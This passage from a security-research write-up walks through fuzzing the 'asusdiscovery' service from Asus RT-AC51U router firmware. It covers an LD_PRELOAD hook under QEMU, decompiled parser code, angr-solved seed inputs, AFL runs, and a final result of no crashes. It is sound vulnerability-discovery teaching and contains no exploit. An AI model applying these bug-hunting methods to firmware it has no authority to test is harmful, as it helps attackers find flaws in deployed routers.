    {hardcode,recover} Hardcode or automatically use prototypes and addresses
    hardcode Use absolute offsets and prototypes
    recover Use radare2 to recover function address and prototype
    optional arguments:
    -h, --help show this help message and exit
    --File FILE, -F FILE ELF executable to create stub from

    An example of the command can be seen below. The stub builder uses radare2 for its function recovery and fails to identify the first argument as a char*, so we need to fix up main_hook.c.

     
    
     
    $ stub_builder -F usr/sbin/asusdiscovery recover name PROCESS_UNPACK_GET_INFO
    [+] Modify main_hook.c to call instrumented function
    [+] Compile with "gcc main_hook.c -o main_hook.so -fPIC -shared -ldl"
    [+] Hook with: LD_PRELOAD=./main_hook.so ./usr/sbin/asusdiscovery
    [+] Created main_hook.c

    Hardcoded values can be inserted instead. The below command supplies the address, argument prototype and the expected return type:

     
    
     
    $ stub_builder -F usr/sbin/asusdiscovery hardcode 0x00401f30 "(char *, int, int)" "int"
     
    
     
    #define _GNU_SOURCE
    #include <stdio.h>
    #include <unistd.h>
    #include <dlfcn.h>
    //gcc main_hook.c -o main_hook.so -fPIC -shared -ldl

    /* Trampoline for the real main() */
    static int (*main_orig)(int, char **, char **);

    /* Our fake main() that gets called by __libc_start_main() */
    int main_hook(int argc, char **argv, char **envp)
    {
        //<arg declarations here>
        char user_buf[512] = {"\x00"};
        //scanf("%512s", user_buf);
        read(0, user_buf, 512);
        int (*do_thing_ptr)(char *, int, int) = (int (*)(char *, int, int))0x401f30;
        int ret_val = (*do_thing_ptr)(user_buf, 0, 0);
        printf("Ret val %d\n", ret_val);
        return 0;
    }

    //uClibc_main
    /*
     * Wrapper for __libc_start_main() that replaces the real main
     * function with our hooked version.
     */
    int __uClibc_main(
        int (*main)(int, char **, char **),
        int argc,
        char **argv,
        int (*init)(int, char **, char **),
        void (*fini)(void),
        void (*rtld_fini)(void),
        void *stack_end)
    {
        /* Save the real main function address */
        main_orig = main;
        /* Find the real __libc_start_main()... */
        typeof(&__uClibc_main) orig = dlsym(RTLD_NEXT, "__uClibc_main");
        /* ... and call it with our custom main function */
        return orig(main_hook, argc, argv, init, fini, rtld_fini, stack_end);
    }

    The code above will accept input from STDIN and pass it into the parsing function directly. This enables us to test and get return values of the function without any networking components required.

     

    Running the code

    Cross compiling the shared object using the provided cross compilers is shown below. The resulting file will be named main_hook.so

     
    
     
    $ /opt/cross-compile/mipsel-linux-uclibc/bin/mipsel-buildroot-linux-uclibc-gcc main_hook.c -o main_hook.so -fPIC -shared -ldl

    Usage of this library is shown below; with my toolchain, the stub isn't linked against libdl and will result in the error below:

     
    
     
    $ qemu-mipsel -L /home/caffix/firmware/asus/RT-AC51U/ext_fw/squashfs-root -E LD_PRELOAD=/main_hook.so ./usr/sbin/asusdiscovery
    ./usr/sbin/asusdiscovery: can't resolve symbol 'dlsym'

    Adding the libdl library to the LD_PRELOAD fixes this problem and resolves the dlsym function.

     
    
     
    $ qemu-mipsel -L /home/caffix/firmware/asus/RT-AC51U/ext_fw/squashfs-root -E LD_PRELOAD=/lib/libdl.so.0:/main_hook.so ./usr/sbin/asusdiscovery
    abcd
    Ret val 4

    We now have the binary running and it's accepting our input and passing it directly to the function. The next stage is generating a set of valid input data to seed our fuzzer with.

     

    Generating valid input for a test corpus

    Sending in random strings of "A"s will not yield newly discovered paths through the parsing function. Looking at the function decompilation, we can see there is a quick check performed in a function titled UnpackGetInfo_NEW. This is the first function we need to look at, to determine if there are any early exits from the initial parsing.

     
    
     
    memset(&local_320,0,0xf8);
    memset(&uStack1000,0,200);
    iVar28 = UnpackGetInfo_NEW(pcParm1,&local_320,&uStack1000);
    iVar39 = a_GetRouterCount;

    This function first checks for a set of magic bytes before continuing. It's looking for "\x0c\x16\x1f\x00" to be the first bytes of the network input (the check compares the little-endian short at offset 2 against 0x1f, so the 0x1f byte comes before the 0x00 on the wire). Without these magic bytes it will exit early and indicate through its return code that the input should be discarded.

     
    
     
    int UnpackGetInfo_NEW(char *user_input, undefined4 *param_2, undefined4 *param_3)
    {
        undefined4 uVar1;
        undefined4 uVar2;
        undefined4 uVar3;
        undefined4 *puVar4;
        undefined4 *puVar5;
        undefined4 *puVar6;

        if (((*user_input != '\f') || (user_input[1] != 0x16)) || (*(short *)(user_input + 2) != 0x1f)) {
            return 1;
        }

    Supplying this magic value immediately returns a different result when running the binary:

     
    
     
    $ python2 -c 'print "\x0c\x16\x1f\x00" + "A"*100' | qemu-mipsel -L . -E LD_PRELOAD=/lib/libdl.so.0:/main_hook.so ./usr/sbin/asusdiscovery
    Ret val 1
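
    The same one-liner can be generalized into a small seed generator that mirrors the magic-byte check (make_seed is a hypothetical helper; the length and filler are arbitrary):

```python
def make_seed(length=300, filler=b"A"):
    # UnpackGetInfo_NEW wants bytes 0 and 1 to be 0x0c 0x16 and the
    # little-endian short at offset 2 to equal 0x1f, i.e. b"\x1f\x00".
    magic = b"\x0c\x16\x1f\x00"
    return (magic + filler * length)[:length]

seed = make_seed()
```

    Any input that fails this prefix check is discarded before the interesting parsing runs, so every corpus file should start this way.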

    The function returns more than just a single value based on the parse or unpack. There appear to be checks on lines 12, 15, 32, and 33, and a result based on the input is returned on line 50.

     
    
     
    int UnpackGetInfo_NEW(char *user_input, undefined4 *param_2, undefined4 *param_3)
    {
        undefined4 uVar1;
        undefined4 uVar2;
        undefined4 uVar3;
        undefined4 *puVar4;
        undefined4 *puVar5;
        undefined4 *puVar6;

        if (((*user_input != '\f') || (user_input[1] != 0x16)) || (*(short *)(user_input + 2) != 0x1f)) {
            return 1;
        }
        puVar6 = (undefined4 *)(user_input + 8);
        do {
            puVar5 = puVar6;
            puVar4 = param_2;
            uVar1 = puVar5[1];
            uVar2 = puVar5[2];
            uVar3 = puVar5[3];
            *puVar4 = *puVar5;
            puVar4[1] = uVar1;
            puVar4[2] = uVar2;
            puVar6 = puVar5 + 4;
            puVar4[3] = uVar3;
            param_2 = puVar4 + 4;
        } while (puVar6 != (undefined4 *)(user_input + 0xf8));
        uVar1 = puVar5[5];
        puVar4[4] = *puVar6;
        puVar4[5] = uVar1;
        if ((*(short *)(user_input + 0x110) == -0x7f7e) &&
            (puVar6 = (undefined4 *)(user_input + 0x110), (user_input[0x112] & 1U) != 0)) {
            do {
                puVar5 = puVar6;
                puVar4 = param_3;
                uVar1 = puVar5[1];
                uVar2 = puVar5[2];
                uVar3 = puVar5[3];
                *puVar4 = *puVar5;
                puVar4[1] = uVar1;
                puVar4[2] = uVar2;
                puVar6 = puVar5 + 4;
                puVar4[3] = uVar3;
                param_3 = puVar4 + 4;
            } while (puVar6 != (undefined4 *)(user_input + 0x1d0));
            uVar1 = puVar5[5];
            puVar4[4] = *puVar6;
            puVar4[5] = uVar1;
            return (uint)((user_input[0x112] & 0x10U) != 0) + 5;
        }
        return 0;
    }
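
    Reading the branch conditions straight off this decompilation, an input that reaches the second copy loop can also be built by hand. A sketch (offsets taken from the code above; deep_seed is a hypothetical helper):

```python
import struct

def deep_seed(length=300):
    # Offsets from the decompilation: the magic prefix gets past the
    # entry check, the signed short at 0x110 must equal -0x7f7e
    # (0x8082 little-endian), and bit 0 of byte 0x112 gates the
    # second copy loop. Bit 4 of the same byte selects return 6 vs 5.
    buf = bytearray(length)
    buf[0:4] = b"\x0c\x16\x1f\x00"
    struct.pack_into("<h", buf, 0x110, -0x7f7e)
    buf[0x112] |= 0x01
    return bytes(buf)

s = deep_seed()
```

    The bytes this produces at offset 0x110 ("\x82\x80\x01") match the angr-solved input shown in the next section.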

    This is a perfect time to break out angr to create a valid input that hits line 50! The following code will create a 300-byte symbolic buffer and have angr solve the constraints required to pass each check in the unpacking function, yielding all potential return results. We are interested in the analysis path that reaches the furthest part of the parsing function. The script below will print out each path's end address and the input required to reach that path.

     
    
     
    import angr
    import angr.sim_options as so
    import claripy
    symbol = "UnpackGetInfo_NEW"
    # Create a project with history tracking
    p = angr.Project('/home/caffix/firmware/asus/RT-AC51U/ext_fw/squashfs-root/usr/sbin/asusdiscovery')
    extras = {so.REVERSE_MEMORY_NAME_MAP, so.TRACK_ACTION_HISTORY}
    # User input will be 300 symbolic bytes
    user_arg = claripy.BVS("user_arg", 300*8)
    # State starts at function address
    start_addr = p.loader.find_symbol(symbol).rebased_addr
    state = p.factory.blank_state(addr=start_addr, add_options=extras)
    # Store symbolic user_input buffer
    state.memory.store(0x100000, user_arg)
    state.regs.a0 = 0x100000
    # Run to exhaustion
    simgr = p.factory.simgr(state)
    simgr.explore()
    # Print each path and the inputs required
    for path in simgr.unconstrained:
        print("{} : {}".format(path, hex([x for x in path.history.bbl_addrs][-1])))
        u_input = path.solver.eval(user_arg, cast_to=bytes)
        print(u_input)

    One of the outputs is shown below, and this input can then be sent back into the program through the above qemu command to validate that it passes the checks.

     
    
     
    <SimState @ <BV32 reg_ra_51_32{UNINITIALIZED}>> : 0x401c4c
    b'\x0c\x16\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x80\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
    ### Running the input
    $ printf '\x0c\x16\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x80\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' | qemu-mipsel -L . -E LD_PRELOAD=/lib/libdl.so.0:/main_hook.so ./usr/sbin/asusdiscovery
    Ret val 1

    I've put each of these inputs into individual files for AFL to read from later.

     
    
     
    $ ls afl_input/
    test_case1 test_case2 test_case3 test_case4 test_case5
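
    Writing the angr-solved inputs out in that layout takes only a few lines; a sketch assuming the solved byte strings are collected in a list (write_corpus is a hypothetical helper):

```python
import os

def write_corpus(inputs, outdir="afl_input"):
    # One solved input per file, named the way the corpus above is
    # laid out for afl-fuzz -i afl_input.
    os.makedirs(outdir, exist_ok=True)
    for i, data in enumerate(inputs, start=1):
        with open(os.path.join(outdir, "test_case%d" % i), "wb") as f:
            f.write(data)
    return sorted(os.listdir(outdir))
```
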

     

    Fuzzing the function

    Using the AFL build process outlined here provides AFL with QEMU mode, which will fuzz asusdiscovery with the following script:

     
    
     
    #!/bin/bash
    export "QEMU_SET_ENV=LD_PRELOAD=/lib/libdl.so.0:/main_hook.so"
    export "QEMU_LD_PREFIX=/home/caffix/firmware/asus/RT-AC51U/ext_fw/squashfs-root"
    export "AFL_INST_LIBS=1"
    #export "AFL_NO_FORKSRV=1"
    BINARY="/home/caffix/firmware/asus/RT-AC51U/ext_fw/squashfs-root/usr/sbin/asusdiscovery"
    afl-fuzz -i afl_input -o output -m none -Q $BINARY

    You will get some incredibly slow fuzzing at about 1-2 executions per second. The AFL fork server is taking way too long to spawn off newly forked processes.


    Adding AFL_NO_FORKSRV=1 will prevent AFL from creating a fork server just before main and forking off new processes. For this type of hooking and emulation it runs much faster, at about 85 executions per second:


    We can do better... Specifically, we can use Abiondo's fork of AFL, which he describes in his blog post here. Abiondo implemented an idea for QEMU that is quoted as speeding up the QEMU emulation by 3 to 4 times. That should put us at 300 or 400 executions per second.

    My idea was to move the instrumentation into the translated code by injecting a snippet of TCG IR at the beginning of every TB. This way, the instrumentation becomes part of the emulated program, so we don’t need to go back into the emulator at every block, and we can re-enable chaining.

    Downloading and running the fork of AFL follows the exact same build process:

     
    
     
    cd afl
    make
    cd qemu_mode
    export CPU_TARGET=mipsel
    ./build_qemu_support.sh

    Rerunning the previous fuzzing command script WITHOUT the AFL_NO_FORKSRV environment variable produces some absolutely insane results:


     

    Final fuzzing results

    After about 24 hours of fuzzing, hardly any new paths were discovered. Some more static analysis on the parsing functions revealed very few spots where any potentially dangerous user input could corrupt anything.

     
    
     
    $ cat output_fast/fuzzer_stats
    start_time : 1555381507
    last_update : 1555385229
    fuzzer_pid : 61241
    cycles_done : 272
    execs_done : 8226287
    execs_per_sec : 2055.33
    paths_total : 85
    paths_favored : 19
    paths_found : 81
    paths_imported : 0
    max_depth : 6
    cur_path : 49
    pending_favs : 0
    pending_total : 0
    variable_paths : 0
    stability : 100.00%
    bitmap_cvg : 1.15%
    unique_crashes : 0
    unique_hangs : 0
    last_path : 1555382334
    last_crash : 0
    last_hang : 0
    execs_since_crash : 8226287
    exec_timeout : 20
    afl_banner : asusdiscovery
    afl_version : 2.52b
    target_mode : qemu
    command_line : afl-fuzz -i afl_input -o output -m none -Q /home/caffix/firmware/asus/RT-AC51U/ext_fw/squashfs-root/usr/sbin/asusdiscovery

     

    Final thoughts

    Over the course of using the LD_PRELOAD trick paired with jumping directly to a function I wanted to fuzz, I was able to save tons of time inside of GDB trying to see which code paths were valid. By using Abiondo's fork of AFL I was able to get execution speeds on par with AFL's compile-time instrumented targets. Getting thousands of executions per second doesn't generally happen when fuzzing applications in AFL's QEMU mode, and I was happy to see 2,000-plus executions per second.

     

    Sursa: https://breaking-bits.gitbook.io/breaking-bits/vulnerability-discovery/reverse-engineering/modern-approaches-toward-embedded-research
